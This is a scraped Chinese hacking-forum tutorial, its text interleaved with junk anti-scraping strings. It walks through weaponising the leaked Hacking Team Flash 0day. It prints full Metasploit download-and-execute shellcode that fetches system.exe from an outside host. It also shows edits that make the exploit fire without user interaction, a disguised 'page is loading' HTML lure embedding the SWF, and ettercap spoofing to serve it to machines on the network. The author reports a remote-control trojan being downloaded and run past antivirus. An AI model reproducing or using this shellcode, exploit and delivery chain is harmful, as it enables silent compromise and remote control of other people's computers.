找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1919|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

$ h$ @/ a& T' u) V3 F 三、flash 0day之手工代码修改制作下载者实例入侵演示 9 U$ D* F0 c. B2 d* c

; F; T& n" @/ r+ W

5 _3 A$ N3 e& w* y3 \* n 利用到的工具: 0 c7 f, X4 d5 r, x

^2 E2 v. a; S! z1 g

/ {* h4 \, n: J9 A, b Msf 1 }; s, e" p0 i

; n4 _4 f- f. c% v+ j; T; Y. e, @

' n/ K* p1 E+ [! q1 {3 C Ettercap $ Y1 A; _0 `: k1 [

5 f' b% B, R+ f/ {9 T$ Q

o [9 X9 a8 p5 U* R Adobe Flash CS6 $ a' W7 a8 {) W

5 D8 G8 y# q2 S1 b

/ z1 h- w. W. _) u Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 ) r% l. p4 M8 r4 d

+ E) E/ i7 ^$ _. T0 H: X

3 b8 _% x0 ?- r5 t( F7 c 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options ; E) H% E* l2 O& D! v3 v. S4 \

5 Q6 H" i7 J& f& q4 k

3 i: Q7 B! |# f1 R) `2 | 如图: : l" h6 I; e, H0 ]5 ] O

k0 h) G( \; ^' }% C) C

0 F3 v) f# n* n1 x4 e   . L: s8 m c; z! ^

% v; [; U/ V3 O r) ]8 r1 W

% n2 c: U/ `! ?: a9 s H9 Y D   - N/ y1 M0 t! d1 X3 ^% F

9 p5 o8 @( Q2 H$ K0 Q V/ C

) Y2 c& y D9 I, y6 _% [" w+ K 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: ; ^2 o2 W8 F) i1 P+ s7 G' J. S+ S

' p1 `; ^( l! I4 C$ v/ p1 x5 m2 G8 ~

% G R/ L* V7 o% l% b   5 s8 ]( T$ G4 o1 K

4 T! g; V5 g4 j4 [- w0 W ]

; `) w* ~) k2 A& F7 o- z   3 A. _+ ` h1 m- E

% V* K& N }9 V9 `. p

: l; ?3 F$ i4 S% f2 p 然后执行generate -t dword生成shellcode,如下: 6 {: @# L V, ]! }8 X# F

1 [' R7 B- V2 f; j) ^1 X

& i- z# w. G( T% c& }; E3 s- T   ' j0 _. A7 \0 S

" c& l% t# f5 V6 z: e2 {8 D& n' l# Z2 k

0 `. s* d; @$ M6 T 复制代码到文本下便于我们一会编辑flash exp,如下: * f ^) f0 e: Z! H9 L8 @# h, z Z

8 t. c" y7 `- D% B4 l

' I" W( E: m* ?8 U4 {) H. @ 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 7 Y" s9 r& I7 _

' f7 R. q' T& G. z# N ?( [; @

$ V9 c2 Y4 V: r7 B$ D8 c' M 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, $ n' {( U# E @, \3 ?( c' v

4 s' y3 C: a; y8 A' O& p

8 ^4 h- |# U0 K- L( b3 M; [5 ^ 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, / Z3 n. H/ _8 ]4 D( G6 p) g' @

0 n$ v2 i2 n6 G4 A

. d+ z: d7 N" n$ f$ f! W 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 6 [/ H0 m' w( U+ Y/ X: h5 X7 |

1 l; C! Q) H: u+ R

# [6 e' D( \( ]% w2 m% U6 x) S 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 9 j, F7 D8 N& j0 H3 W

: I5 z% _, J- a

( v J5 l+ {8 q* k8 V7 D 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, + Z! u( J/ m% o2 W

+ A; A/ n* z/ s4 W- U

/ [1 ~4 r# G7 j3 T& \0 Q9 r 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 1 [$ S( G, ~8 e ^! ^

3 a( p& b1 ^2 V" h9 y

0 S4 o" F$ A- F4 L 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, ; O/ u( ~% F* ^+ N! P! y

, O Q/ P/ D6 o( x! @7 W

% A( D/ o: Y) J 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, - H6 y) G+ z$ m. \1 G4 X* H

9 i6 b$ v* K7 I: B/ g' ]9 e* T4 ~

3 L7 Y: n u I+ C+ T& f 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 2 ]" H/ a3 } b( F6 I0 [4 |. W

7 t$ P: f* J% p, [) Y! Z

& ~9 s: Q, j5 r 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 4 F+ C) S* H5 u4 L% q

! `; |& m4 m; `# D0 e- X/ Q5 w

t6 i$ c1 H7 ?; n, i) { 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, ' U. `$ Z4 b3 d: }

# V: G& g- U7 R; h* _0 W; |- a

5 ^- ]& t* T8 y 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 9 E6 X7 }7 o: i+ [' O0 X- z

" C/ |) a. I! o. ^ J

5 J3 u w* ~5 S0 {; p 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 7 O+ }- f7 H5 R- n( u# r- v

9 a3 J: W4 h7 c: k: V

# S: W9 E' |$ k1 D: H   1 B- H V5 b! T* Q) }6 z

. L; V) U7 F! h% x

" [% P% `( N0 f   $ S; n1 o/ y6 r! d

% B' L4 C$ I! L& _; W. F. b

) S- `" w: n% ~$ X5 n# Z 下面我们来修改flash 0day exp,需要修改三个文件,分别为: - {8 W- }* H( g' O

/ `8 A1 ], r; \! x

5 S. |4 f2 A; N* r   " t1 m- {# f! q l" [

' V7 n0 \7 i+ d3 y6 @) N

& R9 S% W5 _, v2 E 先修改ShellWin32.as,部分源代码如图: & }) H9 e, e# [

" \; V' t% O3 U! E

& d0 z9 E6 h* Y% @/ I3 M2 n   ( G& G/ B5 G: G( |5 C& a, q

% {6 s; N3 ]& q% ]9 ?

3 z8 W9 w* g4 ]0 U; B& j 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: ! f6 L8 |/ Y" H* b6 M

: R3 M) V. v7 ]" H

5 ~4 b9 }" ?& |   * s$ r( O1 E3 u! Y0 n; M

7 e1 r9 {- V1 l& _

, C9 ]+ V. B/ I: L: |% E3 G 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: * v( R7 c5 ~+ t5 }) M$ X

9 r8 c: l+ J! |) j

% Y0 x" ~1 d6 ?/ o3 u0 m- h% [6 r' K   / E! _; ?1 A, ^' g

2 |$ U4 z% t* R3 _: C

$ x2 b+ E$ N4 ?2 R. W2 `( s0 s 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: . ^9 y* n9 {- x1 V* g

: Z9 q+ |* G4 n9 h$ O9 ]

; r9 u( J; N. A4 u   8 t- N; w" X! r2 B/ k

* L: A; a! G: c) H

, r* }7 ]$ j+ B4 }! n2 y& `) B   - s3 k' ?3 p9 h( A3 E! G; `& n, R5 y, ^) W

5 ~2 g! g/ y m. e W( G9 o& Q( A

3 ? W+ j Q2 L5 C, R   5 g. \& ?4 }8 Z7 C1 z

* d7 H! ^* _" J' k/ P

0 E: E% S' X% E6 \* \6 y2 t2 F; ? 然后点保存,下面我们来编译一下,打开 H: W* R! ?- t; L# t

. ?, J8 k) c0 M8 C

! Z0 a4 o% o) d8 @& N exp1.fla然后点文件-发布,看看编译没错误 1 z5 b; o! L' b) y, A+ z

" p( F" w* f: M# {

+ J& H6 d1 C! Z+ l$ r' p) K/ |   , o5 P; H# ^3 g# t+ M

9 N! o' e! Y5 t0 t, ^+ n

7 E, E9 O2 k- {# Y- m0 M   & {! K6 H6 ^9 e7 l! a

4 R& f& P/ s; O0 o, o" S

0 W4 t' ~* z2 r7 ^$ z( p   ) T7 r6 l! y! i7 Q+ j3 w4 L

* `( K+ {+ T5 b3 C. ?, F. h7 Z

6 q" Q1 c" y6 F* t# \+ w4 [   1 U- T' ^, b+ `1 [

v# a/ B2 r* B+ B( t6 [

( H+ u9 q0 X8 w& L, W! ] 然后我们把生成的 5 {! @4 f4 m. y

$ _3 B& j3 `. U9 r2 g' G

' x: ^9 n* S( O. v) r exp1.swf丢到kailinux /var/www/html下: $ H) Z1 K, _1 Q w1 H* I2 ]. [

! R* D+ v% y+ Y" y% `8 s% H" F

2 ^" e. q6 e+ Q$ F4 x 然后把这段代码好好编辑一下 ) v$ Z- T6 P+ t8 W9 G

* R7 |& |& s5 K3 _7 [

; i1 k2 I: o& G8 l( A   + Y8 O( M! t2 ?6 \! t4 h$ q

% q6 p" W/ ^2 C& |! A* Z, X

, q$ Q# \1 B8 h# X   7 e3 D1 l% F8 s; h

9 s& i1 u: c8 x" t

, ]& H/ {7 L2 W: s0 M. o   % C8 f2 B1 U n, T- c( |3 ?1 m" a

+ ^% h9 k- ^0 F

8 R: m- f& t2 q; @, A S$ w   ! s. z; n% e, ^) E1 i* P3 g

* S( Z1 P; U1 b% z

Q1 h, {/ T. ]   3 }& a8 q( k9 V7 S! E5 W

# E0 g, d2 h& G

8 ?! q; ?) h1 ~0 k( Z" R z7 v8 F   . F# x# c4 N# [) H7 v J

# a9 s2 \% V$ e1 E7 C e& g0 @

6 T& K* h3 E! K- q% G+ L <!DOCTYPE html> ( Q1 K3 q+ B+ O1 s3 ^- C% L/ u

# z/ I, |, f! r3 O( H% d

+ `8 T' m5 l2 M* { <html> * i5 z3 |3 c3 x) w

" m/ ], C" w6 l3 k, D

1 }$ c4 Z4 z1 H# M <head> $ i# O2 Z! c* s8 G

1 X9 e6 o* c0 ]3 v* t9 J' {& C

* C' Q$ I. @2 j, z! b: q+ G <meta http-equiv="Content-Type" content="text/html; 2 g" ~6 q9 r! C5 W/ q

- O" b, T8 F' M6 k

^% A) H8 t! L4 X& j5 G/ h charset=utf-8"/> 0 ~' |: f$ f7 T

! x8 B K9 M# M3 Z/ r/ q: h0 Z |

6 Q$ T" N9 C0 y! o </head> 4 v( y! O. \9 ^2 `

$ D7 I1 S+ t3 ^, V5 Z

3 O/ F7 j+ V5 O/ z1 Y( H. m <body> 9 u1 i: T' D# e, K7 V2 V {

2 `( l! F6 M% C/ t9 @- k

" Q8 X( K9 v# N5 E1 `" @/ Q <h2> Please wait, the requested page is loading...</h2> & O/ B0 M N4 t6 O: k

' S" p! O0 A8 c. r: M- ^& B

! Y' t# l" W" w4 j6 k& ^ <br> h7 f' t( \8 @1 D3 O; P) a" r4 ?

+ G0 l } x2 X9 l

* D- f" C. k9 D2 c5 b7 b <OBJECT ' H# r- d: O' g- ?, ]

/ X* U# X: b/ H2 ` g1 H

! e: K9 c* `2 ], z( B6 p7 W7 I classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie - H8 c: M. m' ], o" @9 ~; m

( C9 Q- F& N/ p2 F, Z/ ~( j4 R* `

/ ]; F' T7 o- g# M# N0 E+ p% _ VALUE="http://192.168.0.109/exp1.swf"></OBJECT> * @6 U( g- x$ [# e7 D; Z8 x

. |* ?2 S" A8 P' y9 ` c, b

5 [7 M3 n7 N4 q% \) A/ C </body> / W3 M0 w5 S# F: q: x/ _ p. s z

; \# i$ L' E& L- R

8 m" W5 S* d% I4 w8 R4 ^ <script> 0 d! S! v2 `9 a# u7 A7 E. ]. o

( V9 G0 _; p9 k- l' ?- r

/ [* b% x. q) h: S- e     setTimeout(function () { 0 I; e4 ~' ^- j q- M; f5 [

3 y1 ?9 b8 A% u$ f

) t! z1 V( g" g$ U+ t+ e1 L2 o          & b# }& O% t6 ^8 }4 ~& U9 N

) j0 ^0 N2 j- u+ w w5 O

9 l7 B6 k: i8 u5 }+ b9 G window.location.reload(); ( y: h2 @9 Z. ~ Q7 ]

; E a: x: C- z% G

+ z' g) w8 u* d* m     }, 10000); , Y0 u/ M8 H; F

, M1 H% Q B' G

* h5 i, x. Y v6 |7 M0 u   . g) }. R, b) f" V

4 f% x& M- U8 j+ U# {

& Z4 u- x. A0 w </script> 8 h7 T# n# I; L* Y

2 b9 V/ e/ C9 a

' J6 L! o4 k! j d3 [" T </html> ! G% e/ D: k3 _

; H1 U& B- S. A

5 u) U# p$ ?7 f5 }   " Q0 a# H$ O& Z# p0 f7 ]

0 ?( y- O5 n+ A( m1 f

( @ @# ^2 K G S 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: $ Q9 }$ u) I1 S* n) P1 R* b

% O# ]# \# O! w i- ^ v

# W8 E) q N) c B+ h- M$ j   2 |1 j; F+ p* [& g$ L4 J5 o* k4 S

4 d3 r* [8 K$ _

: N( c/ U6 B0 v+ Q7 O   , N1 P5 A! m, i: c P2 d

, e/ v6 I8 ^9 ~, O! h9 L& L C: z

4 }2 A: }" W; V1 k! F x0 u/ ^   9 y4 h4 E$ [( o+ ?1 @0 e) M9 f5 q- H

4 N' @: c& N2 {6 B- B, c

0 E7 }; U5 e" g7 @   0 i5 q5 [9 O# Q6 u& U5 p

1 }2 y2 {% _8 B: \- M( h* Q( ~

. f# T2 `6 D8 H1 t# g1 l   $ F# k7 _/ J$ A) b% C

1 O: J. Z# p6 \) G, f) D

( k5 v8 @+ a/ _7 z, N @$ y6 _ 下面我们用ettercap欺骗如图: . k( z# P. [8 |: v' V

# T7 R' `: x! U9 c7 a, a+ ]

" ]0 S; y) l0 W. S1 Z4 T   8 Q h/ [+ Z Z

) c: \' e- p2 X9 }5 j) z

6 M0 \* i+ ]/ V' x$ d   * P0 R3 a) X" F0 t

1 H" J$ h+ \, ^8 x

* t3 \* i* f5 u/ U, S 下面我们随便访问个网站看看: ) \; [3 E3 x- x9 N

! n: M& V- l/ A N

$ h) B6 Y- {- R; } 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: $ X- K6 |) l2 v; }* M: e

# e- q+ O7 Y( P. {* N4 N b

% @7 Q0 ^3 P; p' Y s n   " \- Y. a. R5 s' t3 i& h* m2 O/ \

8 f, d( F. I* `% a. R

7 {! {' u2 |& n* P4 i% E 我们看另一台, & t' |5 r4 d* y

/ I. V, K6 d# K7 h

' O+ l( Q5 C: L" f p$ R( L; @$ R6 p 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 3 L3 Y% z k( V1 L# M# e \

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表